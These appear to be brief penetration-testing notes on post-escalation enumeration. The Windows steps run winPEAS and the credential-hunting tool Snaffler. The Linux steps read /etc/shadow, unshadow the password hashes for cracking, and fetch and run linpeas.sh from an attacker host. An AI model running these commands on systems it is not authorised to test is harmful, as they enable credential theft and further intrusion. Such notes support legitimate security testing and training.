Post-Escalation Enumeration

Windows

  • Check the environments architecture:
    • [Environment]::Is64BitOperatingSystem
    • [Environment]::Is64BitProcess
  • File Transfer Techniques
    • ~/tools/winPEASany.exe
    • ~/tools/Snaffler.exe
  • Execute them:
    • tree /F /A C:\Users
    • .\winPEASany.exe > winpeas.txt
    • .\Snaffler.exe -s
  • Active Directory

Linux

  • Unshadow
    • cat /etc/passwd
    • cat /etc/shadow
    • unshadow passwd.txt shadow.txt > unshadow.txt
    • Linux
  • linpeas
    • File Transfer Techniques wget http://{LHOST}:{LPORT}/linpeas.sh
    • chmod +x linpeas.sh
    • ./linpeas.sh -L -a -e > linpeas.txt
    • cat linpeas.txt

Relevant Note(s): Penetration Testing